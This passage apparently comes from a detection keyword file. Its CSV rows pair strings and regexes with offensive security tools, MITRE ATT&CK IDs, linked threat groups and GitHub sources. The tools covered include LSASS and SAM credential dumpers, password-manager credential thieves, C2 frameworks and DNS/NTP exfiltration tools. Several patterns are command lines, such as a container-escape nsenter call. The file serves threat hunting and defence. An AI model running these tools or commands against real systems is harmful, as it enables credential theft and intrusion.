"*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60579" "*subdomains-top1million-20000.txt*",".{0,1000}subdomains\-top1million\-20000\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","60580" 
"*subdomains-uk-1000.txt*",".{0,1000}subdomains\-uk\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60581" "*subdomains-uk-500.txt*",".{0,1000}subdomains\-uk\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60582" "*subdomain-wordlist.txt*",".{0,1000}subdomain\-wordlist\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60583" "*subfinder -d *",".{0,1000}subfinder\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60584" "*subfinder -silent -d *",".{0,1000}subfinder\s\-silent\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60585" "*subfinder --silent*",".{0,1000}subfinder\s\-\-silent.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60586" "*subfinder*",".{0,1000}subfinder.{0,1000}","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/subfinder/subfinder","1","0","N/A","N/A","5","10","11549","1359","2025-04-22T09:43:17Z","2018-03-31T09:44:57Z","60587" "*sublist3r -v -d *",".{0,1000}sublist3r\s\-v\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60588" "*sublist3r.py*",".{0,1000}sublist3r\.py.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. 
subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","60589" "*submodules.pywerview.requester*",".{0,1000}submodules\.pywerview\.requester.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","60590" "*Suborner.exe*",".{0,1000}Suborner\.exe.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","60591" "*Suborner-master.zip*",".{0,1000}Suborner\-master\.zip.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","60592" "*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM 
(classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60594" "*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60595" "*succesfully dumped WINHELLO pin.s to *",".{0,1000}succesfully\sdumped\sWINHELLO\spin\.s\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60596" "*Succesfully Mirrored to lsass.exe*",".{0,1000}Succesfully\sMirrored\sto\slsass\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60597" "*Success! 
DC can be fully compromised by a Zerologon attack*",".{0,1000}Success!\sDC\scan\sbe\sfully\scompromised\sby\sa\sZerologon\sattack.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#content","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","60598" "*Successfully cloned GPO * from SYSVOL*",".{0,1000}Successfully\scloned\sGPO\s.{0,1000}\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","60599" "*Successfully connected to sliver listener*",".{0,1000}Successfully\sconnected\sto\ssliver\slistener.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60600" "*Successfully connected* spawning shell?*",".{0,1000}Successfully\sconnected.{0,1000}\sspawning\sshell\?.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","60601" "*Successfully cracked account password*",".{0,1000}Successfully\scracked\saccount\spassword.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","#content","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","60602" "*Successfully created dump of the forked process*",".{0,1000}Successfully\screated\sdump\sof\sthe\sforked\sprocess.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60603" "*Successfully deleted scheduled task *",".{0,1000}Successfully\sdeleted\sscheduled\stask\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). 
- Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","60604" "*Successfully downloaded the LSASS dump into local file*",".{0,1000}Successfully\sdownloaded\sthe\sLSASS\sdump\sinto\slocal\sfile.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#content","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","60605" "*Successfully dumped lsass process*",".{0,1000}Successfully\sdumped\slsass\sprocess.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60606" "*Successfully dumped SAM and SYSTEM*",".{0,1000}Successfully\sdumped\sSAM\sand\sSYSTEM.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","60607" "*Successfully embedded EXE into GIF*",".{0,1000}Successfully\sembedded\sEXE\sinto\sGIF.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 
7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","60608" "*Successfully embedded EXE into PNG*",".{0,1000}Successfully\sembedded\sEXE\sinto\sPNG.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","60609" "*Successfully hijacked KeePassXC.exe*",".{0,1000}Successfully\shijacked\sKeePassXC\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60610" "*Successfully installed wraith to run on startup *",".{0,1000}Successfully\sinstalled\swraith\sto\srun\son\sstartup\s.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","60611" 
"*Successfully obfuscated file: *.py*",".{0,1000}Successfully\sobfuscated\sfile\:\s.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","60612" "*Successfully poisonned consent.exe*",".{0,1000}Successfully\spoisonned\sconsent\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60613" "*Successfully poisonned LogonUI.exe*",".{0,1000}Successfully\spoisonned\sLogonUI\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60614" "*Successfully poisonned MobaXTerm*",".{0,1000}Successfully\spoisonned\sMobaXTerm.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60615" "*Successfully poisonned mstsc.exe*",".{0,1000}Successfully\spoisonned\smstsc\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60616" "*Successfully poisonned RDCMan.exe*",".{0,1000}Successfully\spoisonned\sRDCMan\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60617" "*Sucessfully performed AppDomainInjection for KeePass*",".{0,1000}Sucessfully\sperformed\sAppDomainInjection\sfor\sKeePass.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60618" "*sudo ./dnsstager*",".{0,1000}sudo\s\.\/dnsstager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#linux","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","60619" "*sudo ./recv -f *",".{0,1000}sudo\s\.\/recv\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","60620" "*sudo 
./startup.sh*",".{0,1000}sudo\s\.\/startup\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","60621" "*sudo ./teamserver *",".{0,1000}sudo\s\.\/teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","#linux","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60622" "*sudo bloodhound*",".{0,1000}sudo\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","#linux","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","60626" "*sudo iodine *",".{0,1000}sudo\siodine\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","60628" "*sudo -l -U dnskire*",".{0,1000}sudo\s\-l\s\-U\sdnskire.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","60629" "*sudo nps start*",".{0,1000}sudo\snps\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","60633" "*sudo -nS id' && lse_sudo=true*",".{0,1000}sudo\s\-nS\sid\'\s\&\&\slse_sudo\=true.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","60634" "*sudo nsenter -t 1 -m -u -i -n -p -- su -*",".{0,1000}sudo\snsenter\s\-t\s1\s\-m\s\-u\s\-i\s\-n\s\-p\s\-\-\ssu\s\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","60635" "*sudo socat -v TCP-LISTEN:135*rogueOxidResolverPort*",".{0,1000}sudo\ssocat\s\-v\sTCP\-LISTEN\:135.{0,1000}rogueOxidResolverPort.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#linux","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","60638" "*sudo tmux new -s icebreaker*",".{0,1000}sudo\stmux\snew\s\-s\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","60641" "*sudo_inject*",".{0,1000}sudo_inject.{0,1000}","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/nongiach/sudo_inject","1","1","#linux","N/A","N/A","8","712","118","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z","60642" "*SUDO_KILLER*",".{0,1000}SUDO_KILLER.{0,1000}","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. 
System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/TH3xACE/SUDO_KILLER","1","1","#linux","N/A","N/A","10","2298","256","2024-12-28T21:52:09Z","2018-12-07T21:08:02Z","60643" "*sudomy.git*",".{0,1000}sudomy\.git.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","60645" "*sudopwn.c*",".{0,1000}sudopwn\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","60646" "*SUID3NUM -*",".{0,1000}SUID3NUM\s\-.{0,1000}","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? 
??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","N/A","7","621","125","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z","60647" "*sullo/nikto*",".{0,1000}sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","60648" "*SunloginClient_11.0.0.33162_X64.exe*",".{0,1000}SunloginClient_11\.0\.0\.33162_X64\.exe.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","60649" "*sunnyelf/cheetah/archive/master.zip*",".{0,1000}sunnyelf\/cheetah\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential 